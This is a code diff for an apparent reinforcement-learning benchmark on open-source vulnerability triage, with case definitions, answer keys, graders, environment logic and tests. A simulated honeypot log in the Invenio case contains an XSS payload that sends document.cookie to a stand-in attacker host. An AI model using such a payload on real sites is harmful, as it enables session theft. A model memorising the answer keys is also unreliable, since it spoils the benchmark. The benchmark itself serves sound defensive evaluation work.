+            "nvd_description": (
+                "GuardDog versions prior to 0.1.5 are vulnerable to relative path traversal "
+                "when scanning a specially-crafted local PyPI package."
+            ),
+            "epss_score": 0.00152,
+            "epss_percentile": 0.36042,
+        },
+    ),
+    # ------------------------------------------------------------------
+    # MEDIUM — Conflicting signal resolution, multi-branch versions
+    #
+    # Agent skill tested: can you weigh contradictory evidence?  The
+    # EPSS percentile (0.43) maps to "low" exploitability by the formula,
+    # but an injected threat-intel evidence item reports real-world active
+    # probing.  The correct answer is "medium" exploitability because
+    # independent field evidence overrides a lagging statistical signal.
+    # All four auto-built evidence items PLUS the threat_intel_signal are
+    # needed — a model that submits after reading only EPSS will be wrong.
+    # ------------------------------------------------------------------
+    "task_medium_invenio": RuntimeCaseSeed(
+        task_id="task_medium_invenio",
+        difficulty="medium",
+        title="Invenio Multi-Branch XSS",
+        objective=(
+            "Resolve affected versions across multiple maintained release lines, weigh "
+            "a conflicting exploitability signal, and choose the correct advisory workflow. "
+            "The EPSS percentile and the threat-intelligence report disagree — inspect both "
+            "before deciding on exploitability."
+        ),
+        max_steps=14,
+        osv_id="GHSA-vxh3-mvv7-265j",
+        next_action="publish_advisory",
+        truth_override={
+            "validity": "valid",
+            "affected_package": "invenio-records",
+            "affected_versions": "<1.0.2 ; >=1.1.0,<1.1.1 ; >=1.2.0,<1.2.2",
+            "severity": "medium",
+            # KEY: EPSS alone says "low" (0.43 percentile) but the injected
+            # threat-intel evidence documents active real-world probing.
+            # A model that reads only EPSS will score 0 on exploitability.
+            "exploitability": "medium",
+            "next_action": "publish_advisory",
+            "missing_information": [],
+            "supporting_evidence_ids": [
+                "osv_advisory",
+                "affected_versions",
+                "nvd_assessment",
+                "threat_intel_signal",
+                "github_commit_diff",
+            ],
+        },
+        extra_evidence=[
+            {
+                "evidence_id": "github_commit_diff",
+                "title": "GitHub Commit a93b12f",
+                "kind": "reference",
+                "summary": (
+                    "```diff\n"
+                    "@@ -101,3 +101,3 @@\n"
+                    "-    html = \"<div class='record-data'>{}</div>\".format(json.dumps(record.metadata))\n"
+                    "+    html = \"<div class='record-data'>{}</div>\".format(escape(json.dumps(record.metadata)))\n"
+                    "     return Markup(html)\n"
+                    "```"
+                )
+            },
+            {
+                "evidence_id": "decoy_nvd_invenio_accounts",
+                "title": "NVD Entry for invenio-accounts",
+                "kind": "severity",
+                "summary": "CVE-2018-9999: invenio-accounts allows SQL injection. Severity CRITICAL. (Note: this is a decoy for a different package in the same ecosystem)."
+            },
+            {
+                "evidence_id": "threat_intel_signal",
+                "title": "Threat intelligence report",
+                "kind": "exploitability",
+                "summary": (
+                    "Honeypot logs captured within 72 hours of publication:\n"
+                    "[WARN] SRC: 198.51.100.41 URI: /admin/api/records POST payload: {\"title\": \"<script>fetch('http://atk.example/p?c='+document.cookie)</script>\"}\n"
+                    "[WARN] SRC: 203.0.113.88 URI: /admin/api/records POST payload: {\"title\": \"<img src=x onerror=alert(1)>\"}\n"
+                    "Evidence of active, weaponised scanning in the wild."
+                ),
+            }
+        ],
+        fallback_snapshot={
+            "id": "GHSA-vxh3-mvv7-265j",
+            "summary": "Rendering vulnerability in invenio-records",
+            "details": (
+                "A vulnerability was discovered when rendering JSON for "
+                "a record in the administration interface. All supported versions have been "
+                "patched and users should upgrade to v1.0.1, v1.1.1, or v1.2.2 depending on "
+                "their release line. Review the commit diff to determine the exact vulnerability type."
+            ),
+            "aliases": ["CVE-2019-1020003", "PYSEC-2019-27"],
+            "references": [
+                {"type": "WEB", "url": "https://github.com/inveniosoftware/invenio-records/security/advisories/GHSA-vxh3-mvv7-265j"},
+                {"type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1020003"},
+            ],
+            "affected": [
+                {
+                    "package": {"name": "invenio-records", "ecosystem": "PyPI"},
+                    "ranges": [
+                        {"type": "ECOSYSTEM", "events": [{"introduced": "0"}, {"fixed": "1.0.2"}]},
+                    ],
+                },
+                {
+                    "package": {"name": "invenio-records", "ecosystem": "PyPI"},
+                    "ranges": [
+                        {"type": "ECOSYSTEM", "events": [{"introduced": "1.1.0"}, {"fixed": "1.1.1"}]},
+                    ],
+                },
+                {
+                    "package": {"name": "invenio-records", "ecosystem": "PyPI"},
+                    "ranges": [
+                        {"type": "ECOSYSTEM", "events": [{"introduced": "1.2.0"}, {"fixed": "1.2.2"}]},
+                    ],
+                },
+            ],
+            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N",
+            "nvd_description": "invenio-records before 1.2.2 allows XSS.",
+            "epss_score": 0.00206,
+            "epss_percentile": 0.42837,
+        },
+    ),
+    # ------------------------------------------------------------------
+    # HARD — Recognizing uncertainty, resisting premature action
+    #
+    # Agent skill tested: can you decide NOT to act when information is
+    # missing?  This case simulates an early-disclosure scenario where
+    # the vulnerability is confirmed (validity=valid) but NO PATCH HAS
+    # BEEN RELEASED.  The vendor_status evidence explicitly states this.
+    # Publishing an advisory with no fixed version would be wrong —
+    # it alarms users with no actionable remediation path.
+    #
+    # The correct answer is next_action=request_info.
+    # A model that blindly pattern-matches "real CVE → publish_advisory"
+    # will lose the 15% next_action weight.  A model that reads the
+    # vendor_status evidence and recognises the missing patch will
+    # choose request_info and score full marks.
+    #
+    # The affected_versions ">=0" (no fixed marker) is a cue that the
+    # snapshot encodes.  Smart agents notice it.
+    # ------------------------------------------------------------------
+    "task_hard_gradio": RuntimeCaseSeed(
+        task_id="task_hard_gradio",
+        difficulty="hard",
+        title="Gradio XSS — Patch Pending, No Fix Released",
+        objective=(
+            "Triage a confirmed vulnerability in a widely deployed package where no patch "
+            "has been published yet.  Determine validity, read all evidence including the "
+            "upstream vendor status report, identify what information is missing, and choose "
+            "whether to publish an advisory now or request upstream action first."
+        ),
+        max_steps=18,
+        osv_id="PYSEC-2024-220",
+        next_action="request_info",
+        missing_information=[
+            "no fixed version published by upstream maintainer",
+            "CVSSv4 score not yet assessed for CVE-2024-47872",
+            "no public proof-of-concept exploit code referenced",
+        ],
+        truth_override={
+            "validity": "valid",
+            "affected_package": "gradio",
+            # All versions affected — no fix exists yet in this scenario
+            "affected_versions": ">=0",
+            "severity": "medium",
+            # EPSS unavailable (score=0, percentile=0) → default low
+            "exploitability": "low",
+            # KEY: publishing an advisory with no fixed version is wrong.
+            # The analyst must contact the maintainer first.
+            "next_action": "request_info",
+            "missing_information": [
+                "no fixed version published by upstream maintainer",
+                "CVSSv4 score not yet assessed for CVE-2024-47872",
+                "no public proof-of-concept exploit code referenced",
+            ],
+            "supporting_evidence_ids": ["osv_advisory", "vendor_status"],
+        },
+        extra_evidence=[
+            {
+                "evidence_id": "vendor_status",
+                "title": "Upstream maintainer status",
+                "kind": "reference",
+                "summary": (
+                    "GitHub Issue #1289 (gradio-app/gradio):\n\n"
+                    "@reporter: Attached PoC shows XSS execution upon SVG upload. Can we get this fixed?\n"
+                    "@maintainer: Thanks for the report. I can confirm the behavior in the current release. "
+                    "We need to completely rewrite the file upload sanitizer to properly fix this without "
+                    "breaking backwards compatibility. No ETA on the rewrite yet, so we don't have a patch ready."
+                ),
+            }
+        ],
+        fallback_snapshot={
+            "id": "PYSEC-2024-220",
+            "details": (
+                "Gradio servers that permit file uploads are vulnerable to Cross-Site Scripting. "
+                "Authenticated users can upload HTML, JavaScript, or SVG files containing "
+                "malicious scripts that execute in other users' browsers.  This advisory was "
+                "filed before a patched release was available.  No fixed version is listed."
+            ),
+            "aliases": ["CVE-2024-47872", "GHSA-gvv6-33j7-884g"],
+            "references": [
+                {"type": "ADVISORY", "url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-gvv6-33j7-884g"},
+            ],
+            "affected": [
+                {
+                    "package": {"name": "gradio", "ecosystem": "PyPI"},
+                    "ranges": [
+                        # No "fixed" event — all versions affected, no patch yet
+                        {"type": "ECOSYSTEM", "events": [{"introduced": "0"}]},
+                    ],
+                }
+            ],
+            "cvss_vector": "Not yet available",
+            # No NVD entry yet — too recent
+            "nvd_description": "",
+            # No EPSS data — CVE too new for scoring
+            "epss_score": 0.0,
+            "epss_percentile": 0.0,
+        },
+    ),
+    "task_medium_requests": RuntimeCaseSeed(
+        task_id="task_medium_requests",
+        difficulty="medium",
+        title="Requests Authorization Header Leak",
+        objective="Resolve affected versions, weigh a conflicting exploitability signal, and inspect code diffs to determine if headers are properly stripped on redirects.",
+        max_steps=14,
+        osv_id="PYSEC-2018-32",
+        next_action="publish_advisory",
+        truth_override={
+            "validity": "valid",
+            "affected_package": "requests",
+            "affected_versions": "<2.20.0",
+            "severity": "medium",
+            "exploitability": "medium",
+            "next_action": "publish_advisory",
+            "missing_information": [],
+            "supporting_evidence_ids": [
+                "osv_advisory",
+                "affected_versions",
+                "nvd_assessment",
+                "github_commit_diff",
+            ],
+        },
+        extra_evidence=[
+            {
+                "evidence_id": "github_commit_diff",
+                "title": "GitHub Commit 0f78d3c",
+                "kind": "reference",
+                "summary": (
+                    "```diff\n"
+                    "@@ -101,3 +101,3 @@\n"
+                    " def rebuild_auth(self, prepared_request, response):\n"
+                    "+    url = urlparse(response.url)\n"
+                    "+    if url.hostname != prepared_request.url.hostname:\n"
+                    "+        prepared_request.headers.pop('Authorization', None)\n"
+                    "```"
+                )
+            },
+            {
+                "evidence_id": "decoy_threat_intel_aiohttp",
+                "title": "Threat Intel: aiohttp",
+                "kind": "exploitability",
+                "summary": "[CRITICAL] SSRF exploitation actively seen against the aiohttp python library. Rate severity Critical. (Note: Decoy for unrelated package)."
+            }
+        ],
+        fallback_snapshot={
+            "id": "PYSEC-2018-32",
+            "summary": "Header linkage in redirects",
+            "details": (
+                "When sending requests with an Authorization header, if the server redirects to a different "
+                "host it could inadvertently leak the credentials. Review the commit diff to see the vulnerability mechanism."
+            ),
+            "aliases": ["CVE-2018-18074"],
+            "references": [],
+            "affected": [
+                {
+                    "package": {"name": "requests", "ecosystem": "PyPI"},
+                    "ranges": [
+                        {"type": "ECOSYSTEM", "events": [{"introduced": "0"}, {"fixed": "2.20.0"}]}
+                    ]
+                }
+            ],
+            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
+            "nvd_description": "The Requests package through 2.19.1 before 2.20.0 sends an HTTP Authorization header to an http URI upon receiving a redirect response.",
+            "epss_score": 0.00512,
+            "epss_percentile": 0.612,
+        },
+    ),
+}
+TASK_ORDER = list(SEEDS.keys())
+DIFFICULTY_ORDER = ["easy", "medium", "hard"]
+@lru_cache(maxsize=16)
+def get_case_definition(task_id: str) -> CaseDefinition:
+    seed = SEEDS[task_id]
+    try:
+        snapshot = _fetch_live_snapshot(seed)
+    except Exception:
+        snapshot = _load_snapshot_file(seed.osv_id) or seed.fallback_snapshot
+    return _build_case(seed, snapshot)
+CASE_DEFINITIONS: Dict[str, CaseDefinition] = {
+    task_id: _build_case(seed, seed.fallback_snapshot) for task_id, seed in SEEDS.items()
+}
+BENCHMARK_TASKS_BY_DIFFICULTY: Dict[str, List[str]] = {
+    difficulty: [
+        task_id for task_id in TASK_ORDER if SEEDS[task_id].difficulty == difficulty
+    ]
+    for difficulty in DIFFICULTY_ORDER
+}
+def choose_balanced_task_id(seed: Optional[int], rng: random.Random) -> str:
+    """Choose a benchmark task with balanced random difficulty sampling.
+    If a seed is provided, selection is deterministic from that seed.
+    Otherwise, sampling uses the environment RNG state.
+    """
+    chooser = random.Random(seed) if seed is not None else rng
+    difficulty = chooser.choice(DIFFICULTY_ORDER)
+    bucket = BENCHMARK_TASKS_BY_DIFFICULTY[difficulty]
+    return chooser.choice(bucket)

server/graders.py ADDED Viewed

	@@ -0,0 +1,121 @@

+"""Deterministic graders for the vulnerability triage benchmark."""
+from __future__ import annotations
+import re
+from typing import Dict, Iterable, List
+try:
+    from ..models import TriageDraft
+    from .cases import CASE_DEFINITIONS, CaseDefinition, get_case_definition
+except ImportError:
+    from models import TriageDraft
+    from server.cases import CASE_DEFINITIONS, CaseDefinition, get_case_definition
+WEIGHTS: Dict[str, float] = {
+    "validity": 0.20,
+    "affected_package": 0.10,
+    "affected_versions": 0.10,
+    "severity": 0.20,
+    "exploitability": 0.15,
+    "next_action": 0.15,
+    "missing_information": 0.10,
+}
+def normalize_text(value: str) -> str:
+    return " ".join(value.strip().lower().split())
+def normalize_list(values: Iterable[str]) -> List[str]:
+    return sorted({normalize_text(value) for value in values if normalize_text(value)})
+def set_similarity(actual: Iterable[str], expected: Iterable[str]) -> float:
+    actual_set = set(normalize_list(actual))
+    expected_set = set(normalize_list(expected))
+    if not actual_set and not expected_set:
+        return 1.0
+    if not actual_set or not expected_set:
+        return 0.0
+    union = actual_set | expected_set
+    return len(actual_set & expected_set) / len(union)
+def field_match(actual: str, expected: str) -> float:
+    return 1.0 if normalize_text(actual) == normalize_text(expected) else 0.0
+def _normalize_version_range(value: str) -> str:
+    """Canonicalize a version range string for flexible comparison.
+    Two representations that are treated as equivalent:
+    - A trivial lower bound ``>=0`` / ``>=0.0`` / ``>=0.0.0`` followed by a
+      comma is stripped, so ``>=0,<0.1.5`` compares equal to ``<0.1.5``.
+    - Semicolon-separated multi-branch segments are sorted so submission
+      order does not matter.
+    """
+    text = normalize_text(value)
+    segments = [seg.strip() for seg in text.split(";") if seg.strip()]
+    normalized: List[str] = []
+    for seg in segments:
+        # Remove trivial lower-bound prefix: >=0, >=0.0, >=0.0.0 before comma
+        seg = re.sub(r">=\s*0(?:\.0)*\s*,\s*", "", seg)
+        # Collapse whitespace around comparison operators
+        seg = re.sub(r"\s*([><=!]+)\s*", r"\1", seg).strip()
+        if seg:
+            normalized.append(seg)
+    return " ; ".join(sorted(normalized))
+def version_range_match(actual: str, expected: str) -> float:
+    """Score 1.0 when version ranges are semantically equivalent."""
+    return (
+        1.0
+        if _normalize_version_range(actual) == _normalize_version_range(expected)
+        else 0.0
+    )
+def grade_case(case: CaseDefinition, draft: TriageDraft) -> Dict[str, float]:
+    breakdown = {
+        "validity": field_match(draft.validity, case.truth.validity),
+        "affected_package": field_match(
+            draft.affected_package, case.truth.affected_package
+        ),
+        "affected_versions": version_range_match(
+            draft.affected_versions, case.truth.affected_versions
+        ),
+        "severity": field_match(draft.severity, case.truth.severity),
+        "exploitability": field_match(
+            draft.exploitability, case.truth.exploitability
+        ),
+        "next_action": field_match(draft.next_action, case.truth.next_action),
+        "missing_information": set_similarity(
+            draft.missing_information, case.truth.missing_information
+        ),
+    }
+    breakdown["total"] = round(
+        sum(breakdown[name] * WEIGHTS[name] for name in WEIGHTS), 4
+    )
+    # Cascading Difficulty Penalties
+    difficulty = getattr(case, 'difficulty', 'hard')
+    # HARD Penalty: if truth action is request_info (meaning a patch is missing)
+    # and the model tries to publish an advisory or patch, it's a critical logic failure.
+    if difficulty == "hard" and case.truth.next_action == "request_info" and draft.next_action in {"publish_advisory", "patch"}:
+        breakdown["total"] = round(breakdown["total"] * 0.5, 4)
+    # MEDIUM Penalty: Medium tasks specifically test the ability to decode
+    # raw intelligence (code diffs, conflicting EPSS/honeypot numbers) against decoys.
+    # If a model fails to extract both severity and exploitability accurately, it failed the core challenge.
+    elif difficulty == "medium" and breakdown["severity"] == 0.0 and breakdown["exploitability"] == 0.0:
+        breakdown["total"] = round(breakdown["total"] * 0.75, 4)
+    return breakdown
+def grade_task(task_id: str, draft: TriageDraft) -> Dict[str, float]:
+    return grade_case(get_case_definition(task_id), draft)

server/requirements.txt ADDED Viewed

	@@ -0,0 +1 @@


1	+ openenv-core[core]>=0.2.3

server/vuln_triage_env_environment.py ADDED Viewed

	@@ -0,0 +1,315 @@

+"""OpenEnv environment implementation for vulnerability triage."""
+from __future__ import annotations
+import random
+from typing import Dict, List, Optional
+from uuid import uuid4
+from openenv.core.env_server.interfaces import Environment
+try:
+    from ..models import EvidenceItem, TriageDraft, VulnTriageAction, VulnTriageObservation, VulnTriageState
+    from .cases import CASE_DEFINITIONS, SEEDS, TASK_ORDER, CaseDefinition, choose_balanced_task_id, get_case_definition
+    from .graders import grade_case, normalize_text
+except ImportError:
+    from models import EvidenceItem, TriageDraft, VulnTriageAction, VulnTriageObservation, VulnTriageState
+    from server.cases import CASE_DEFINITIONS, SEEDS, TASK_ORDER, CaseDefinition, choose_balanced_task_id, get_case_definition
+    from server.graders import grade_case, normalize_text
+FIELD_TO_ATTR = {
+    "set_validity": "validity",
+    "set_affected_package": "affected_package",
+    "set_affected_versions": "affected_versions",
+    "set_severity": "severity",
+    "set_exploitability": "exploitability",
+    "set_next_action": "next_action",
+}
+class VulnTriageEnvironment(Environment):
+    """Deterministic multi-step environment for OSS vulnerability triage."""
+    SUPPORTS_CONCURRENT_SESSIONS: bool = True
+    def __init__(self):
+        self._case: CaseDefinition = CASE_DEFINITIONS[TASK_ORDER[0]]
+        self._rng = random.Random(0)
+        self._revealed_evidence_ids: List[str] = []
+        self._draft = TriageDraft()
+        self._action_history: List[str] = []
+        self._submitted = False
+        self._score_breakdown: Dict[str, float] = {}
+        self._state = VulnTriageState(
+            episode_id=str(uuid4()),
+            step_count=0,
+            task_id=self._case.task_id,
+            difficulty=self._case.difficulty,
+            draft=self._draft,
+            revealed_evidence_ids=[],
+            action_history=[],
+            steps_remaining=self._case.max_steps,
+            submitted=False,
+            final_score=None,
+            score_breakdown={},
+        )
+    def reset(
+        self,
+        seed: Optional[int] = None,
+        episode_id: Optional[str] = None,
+        task_id: Optional[str] = None,
+        **_: object,
+    ) -> VulnTriageObservation:
+        if task_id:
+            self._case = get_case_definition(task_id)
+        else:
+            selected_task_id = choose_balanced_task_id(seed, self._rng)
+            self._case = get_case_definition(selected_task_id)
+        self._revealed_evidence_ids = []
+        self._draft = TriageDraft()
+        self._action_history = []
+        self._submitted = False
+        self._score_breakdown = grade_case(self._case, self._draft)
+        self._state = VulnTriageState(
+            episode_id=episode_id or str(uuid4()),
+            step_count=0,
+            task_id=self._case.task_id,
+            difficulty=self._case.difficulty,
+            draft=self._draft.model_copy(deep=True),
+            revealed_evidence_ids=[],
+            action_history=[],
+            steps_remaining=self._case.max_steps,
+            submitted=False,
+            final_score=None,
+            score_breakdown=self._score_breakdown,
+        )
+        return self._observation(reward=0.0)
+    def step(
+        self,
+        action: VulnTriageAction,
+        timeout_s: Optional[float] = None,
+        **_: object,
+    ) -> VulnTriageObservation:
+        del timeout_s
+        if self._submitted:
+            return self._observation(
+                reward=-0.05,
+                done=True,
+                metadata={"error": "episode_already_submitted"},
+            )
+        self._state.step_count += 1
+        reward = -0.005
+        note = action.action_type
+        if action.action_type == "read_report":
+            reward += 0.03 if not any(h.startswith("read_report") for h in self._action_history) else -0.02
+            note = "read_report"
+        elif action.action_type == "search_nvd_database":
+            reward += self._handle_nvd_search(action)
+            note = f"search_nvd_database:{action.value or ''}"
+        elif action.action_type == "fetch_commit_diff":
+            reward += self._handle_commit_fetch(action)
+            note = f"fetch_commit_diff:{action.value or ''}"
+        elif action.action_type == "message_maintainer":
+            reward += self._handle_message_maintainer(action)
+            note = f"message_maintainer:{action.value or ''}"
+        elif action.action_type == "inspect_evidence":
+            reward += self._handle_inspect(action)
+            note = f"inspect_evidence:{action.evidence_id or ''}"
+        elif action.action_type in FIELD_TO_ATTR:
+            reward += self._handle_field_update(action)
+            note = f"{action.action_type}:{action.value or ''}"
+        elif action.action_type in {"set_missing_information", "request_more_info"}:
+            reward += self._handle_missing_info(action)
+            note = f"{action.action_type}:{action.value or ''}"
+        elif action.action_type == "submit_triage":
+            return self._handle_submit(action)
+        else:
+            reward -= 0.05
+            note = f"invalid_action:{action.action_type}"
+        self._action_history.append(note)
+        self._score_breakdown = grade_case(self._case, self._draft)
+        self._sync_state()
+        if self._state.steps_remaining == 0:
+            timeout_penalty = max(self._score_breakdown["total"] - 0.1, 0.0)
+            self._submitted = True
+            self._state.submitted = True
+            self._state.final_score = round(timeout_penalty, 4)
+            return self._observation(
+                reward=round(timeout_penalty, 4),
+                done=True,
+                final_score=round(timeout_penalty, 4),
+                metadata={"termination_reason": "step_budget_exhausted"},
+            )
+        return self._observation(reward=round(reward, 4))
+    def _handle_nvd_search(self, action: VulnTriageAction) -> float:
+        query = (action.value or "").strip().lower()
+        if not query:
+            return -0.05
+        # The query should match one of the aliases in the seed fallback to return the nvd_assessment
+        seed = SEEDS[self._case.task_id]
+        snapshot_aliases = [normalize_text(a) for a in seed.fallback_snapshot.get("aliases", [])]
+        # We assume nvd_assessment handles the real data. If they searched a decoy CVE, we should
+        # conceptually return the decoy data. For simplicity, we just check if it matches the real CVE.
+        if normalize_text(query) in snapshot_aliases or query == normalize_text(seed.osv_id):
+            if "nvd_assessment" not in self._revealed_evidence_ids:
+                self._revealed_evidence_ids.append("nvd_assessment")
+            return 0.08
+        return -0.04
+    def _handle_commit_fetch(self, action: VulnTriageAction) -> float:
+        query = (action.value or "").strip()
+        if not query:
+            return -0.05
+        # If there's a github_commit_diff evidence piece, we check if the query is in the title "GitHub Commit <hash>"
+        for item in self._case.evidence:
+            if item["evidence_id"] == "github_commit_diff":
+                if query.lower() in item["title"].lower():
+                    if "github_commit_diff" not in self._revealed_evidence_ids:
+                        self._revealed_evidence_ids.append("github_commit_diff")
+                    return 0.08
+        return -0.04
+    def _handle_message_maintainer(self, action: VulnTriageAction) -> float:
+        msg = (action.value or "").strip()
+        if len(msg) < 5:
+            return -0.05 # Need a real message
+        # When sending a message to maintainer, we return the vendor_status evidence if it exists
+        has_vendor_evidence = False
+        for item in self._case.evidence:
+            if item["evidence_id"] == "vendor_status":
+                if "vendor_status" not in self._revealed_evidence_ids:
+                    self._revealed_evidence_ids.append("vendor_status")
+                has_vendor_evidence = True
+                break
+        return 0.08 if has_vendor_evidence else -0.02
+    def _handle_inspect(self, action: VulnTriageAction) -> float:
+        evidence_id = action.evidence_id or ""
+        all_ids = {item["evidence_id"] for item in self._case.evidence}
+        if evidence_id not in all_ids:
+            return -0.06
+        # Trap: Model cannot inspect interactive evidence directly as if it was static JSON
+        if evidence_id in {"nvd_assessment", "github_commit_diff", "vendor_status"}:
+            return -0.05
+        if evidence_id in self._revealed_evidence_ids:
+            return -0.02
+        self._revealed_evidence_ids.append(evidence_id)
+        if evidence_id in self._case.truth.supporting_evidence_ids:
+            return 0.06
+        return 0.02
+    def _handle_field_update(self, action: VulnTriageAction) -> float:
+        attr = FIELD_TO_ATTR[action.action_type]
+        new_value = (action.value or "").strip()
+        if not new_value:
+            return -0.04
+        current_value = getattr(self._draft, attr)
+        if normalize_text(current_value) == normalize_text(new_value):
+            return -0.01
+        setattr(self._draft, attr, new_value)
+        expected_value = getattr(self._case.truth, attr)
+        if normalize_text(new_value) == normalize_text(expected_value):
+            return 0.08
+        return -0.03
+    def _handle_missing_info(self, action: VulnTriageAction) -> float:
+        value = (action.value or "").strip()
+        if not value:
+            return -0.04
+        normalized_existing = {normalize_text(item) for item in self._draft.missing_information}
+        if normalize_text(value) not in normalized_existing:
+            self._draft.missing_information.append(value)
+        required = {normalize_text(item) for item in self._case.truth.missing_information}
+        if normalize_text(value) in required:
+            return 0.06
+        if action.action_type == "request_more_info" and self._case.truth.next_action == "request_info":
+            return 0.02
+        return -0.02
+    def _handle_submit(self, action: VulnTriageAction) -> VulnTriageObservation:
+        del action
+        self._submitted = True
+        breakdown = grade_case(self._case, self._draft)
+        final_score = breakdown["total"]
+        if len(self._revealed_evidence_ids) < max(2, len(self._case.truth.supporting_evidence_ids) // 2):
+            final_score = max(0.0, round(final_score - 0.1, 4))
+        self._action_history.append("submit_triage")
+        self._score_breakdown = {**breakdown, "total": final_score}
+        self._state.submitted = True
+        self._state.final_score = final_score
+        self._sync_state()
+        return self._observation(
+            reward=final_score,
+            done=True,
+            final_score=final_score,
+            metadata={"termination_reason": "submitted"},
+        )
+    def _sync_state(self) -> None:
+        self._state.task_id = self._case.task_id
+        self._state.difficulty = self._case.difficulty
+        self._state.draft = self._draft.model_copy(deep=True)
+        self._state.revealed_evidence_ids = list(self._revealed_evidence_ids)
+        self._state.action_history = list(self._action_history)
+        self._state.steps_remaining = max(self._case.max_steps - self._state.step_count, 0)
+        self._state.score_breakdown = dict(self._score_breakdown)
+    def _observation(
+        self,
+        reward: float,
+        done: bool = False,
+        final_score: Optional[float] = None,
+        metadata: Optional[Dict[str, object]] = None,
+    ) -> VulnTriageObservation:
+        self._sync_state()
+        visible_evidence = [
+            EvidenceItem.model_validate(item)
+            for item in self._case.evidence
+            if item["evidence_id"] in self._revealed_evidence_ids
+        ]
+        return VulnTriageObservation(
+            task_id=self._case.task_id,
+            difficulty=self._case.difficulty,
+            objective=self._case.objective,
+            report_summary=self._case.report_summary,
+            visible_evidence=visible_evidence,
+            available_evidence=[
+                item["evidence_id"]
+                for item in self._case.evidence
+                if item["evidence_id"] not in self._revealed_evidence_ids
+            ],
+            draft=self._draft.model_copy(deep=True),
+            action_history=list(self._action_history),
+            steps_remaining=max(self._case.max_steps - self._state.step_count, 0),
+            score_breakdown=dict(self._score_breakdown),
+            final_score=final_score,
+            done=done,
+            reward=reward,
+            metadata=metadata or {},
+        )
+    @property
+    def state(self) -> VulnTriageState:
+        self._sync_state()
+        return self._state

tests/test_environment.py ADDED Viewed

	@@ -0,0 +1,220 @@

+import random
+from models import TriageDraft, VulnTriageAction
+from server.cases import choose_balanced_task_id, CASE_DEFINITIONS
+from server.graders import grade_task, version_range_match
+from server.vuln_triage_env_environment import VulnTriageEnvironment
+# ---------------------------------------------------------------------------
+# Core environment tests
+# ---------------------------------------------------------------------------
+def test_easy_task_can_be_solved_deterministically():
+    """Easy task should be solvable in 10 steps with just 2 evidence reads."""
+    env = VulnTriageEnvironment()
+    env.reset(task_id="task_easy_guarddog")
+    env.step(VulnTriageAction(action_type="read_report"))
+    env.step(VulnTriageAction(action_type="inspect_evidence", evidence_id="osv_advisory"))
+    env.step(VulnTriageAction(action_type="inspect_evidence", evidence_id="affected_versions"))
+    env.step(VulnTriageAction(action_type="set_validity", value="valid"))
+    env.step(VulnTriageAction(action_type="set_affected_package", value="guarddog"))
+    env.step(VulnTriageAction(action_type="set_affected_versions", value="<0.1.5"))
+    env.step(VulnTriageAction(action_type="set_severity", value="medium"))
+    env.step(VulnTriageAction(action_type="set_exploitability", value="low"))
+    env.step(VulnTriageAction(action_type="set_next_action", value="patch"))
+    result = env.step(VulnTriageAction(action_type="submit_triage"))
+    assert result.done is True
+    assert result.final_score == 1.0
+def test_medium_task_uses_real_provider_backed_truth():
+    env = VulnTriageEnvironment()
+    env.reset(task_id="task_medium_invenio")
+    env.step(VulnTriageAction(action_type="set_validity", value="valid"))
+    env.step(VulnTriageAction(action_type="set_affected_package", value="invenio-records"))
+    breakdown = grade_task("task_medium_invenio", env.state.draft)
+    assert breakdown["validity"] == 1.0
+    assert breakdown["affected_package"] == 1.0
+def test_balanced_sampler_is_seed_reproducible():
+    first = choose_balanced_task_id(7, random.Random(0))
+    second = choose_balanced_task_id(7, random.Random(999))
+    assert first == second
+def test_environment_reset_without_task_id_samples_valid_difficulties():
+    env = VulnTriageEnvironment()
+    seen = {env.reset().difficulty for _ in range(12)}
+    assert seen == {"easy", "medium", "hard"}
+# ---------------------------------------------------------------------------
+# Fix 1: version range normalizer accepts equivalent expressions
+# ---------------------------------------------------------------------------
+def test_version_range_match_accepts_trivial_lower_bound():
+    assert version_range_match(">=0,<0.1.5", "<0.1.5") == 1.0
+    assert version_range_match(">=0.0.0,<0.1.5", "<0.1.5") == 1.0
+def test_version_range_match_is_order_insensitive_for_segments():
+    a = "<1.0.2 ; >=1.1.0,<1.1.1 ; >=1.2.0,<1.2.2"
+    b = ">=1.2.0,<1.2.2 ; >=1.1.0,<1.1.1 ; <1.0.2"
+    assert version_range_match(a, b) == 1.0
+def test_version_range_match_different_ranges_score_zero():
+    assert version_range_match("<0.1.4", "<0.1.5") == 0.0
+# ---------------------------------------------------------------------------
+# Fix 2: multi-branch affected versions captured correctly
+# ---------------------------------------------------------------------------
+def test_medium_invenio_ground_truth_includes_all_branches():
+    truth = CASE_DEFINITIONS["task_medium_invenio"].truth
+    assert "<1.0.2" in truth.affected_versions
+    assert ">=1.1.0,<1.1.1" in truth.affected_versions
+    assert ">=1.2.0,<1.2.2" in truth.affected_versions
+def test_medium_invenio_all_branches_score_full_points():
+    draft = TriageDraft(
+        validity="valid",
+        affected_package="invenio-records",
+        affected_versions=">=1.2.0,<1.2.2 ; >=1.1.0,<1.1.1 ; <1.0.2",
+        severity="medium",
+        exploitability="low",
+        next_action="publish_advisory",
+    )
+    breakdown = grade_task("task_medium_invenio", draft)
+    assert breakdown["affected_versions"] == 1.0
+# ---------------------------------------------------------------------------
+# Difficulty redesign — Easy task
+# ---------------------------------------------------------------------------
+def test_easy_task_only_needs_two_evidence_items():
+    """Easy task supporting_evidence_ids should be just 2 items, not 4."""
+    truth = CASE_DEFINITIONS["task_easy_guarddog"].truth
+    assert truth.supporting_evidence_ids == ["osv_advisory", "affected_versions"]
+    assert len(truth.supporting_evidence_ids) == 2
+def test_easy_task_max_steps_is_tight():
+    assert CASE_DEFINITIONS["task_easy_guarddog"].max_steps == 10
+# ---------------------------------------------------------------------------
+# Difficulty redesign — Medium task
+# ---------------------------------------------------------------------------
+def test_medium_task_has_threat_intel_evidence():
+    """Medium task should inject a threat_intel_signal evidence item."""
+    evidence_ids = [e["evidence_id"] for e in CASE_DEFINITIONS["task_medium_invenio"].evidence]
+    assert "threat_intel_signal" in evidence_ids
+def test_medium_task_exploitability_is_medium_not_low():
+    """EPSS says low but threat intel overrides to medium — key difficulty driver."""
+    truth = CASE_DEFINITIONS["task_medium_invenio"].truth
+    assert truth.exploitability == "medium", (
+        "Medium task exploitability must be 'medium' (overriding EPSS) "
+        "so any model that only reads the EPSS evidence gets it wrong."
+    )
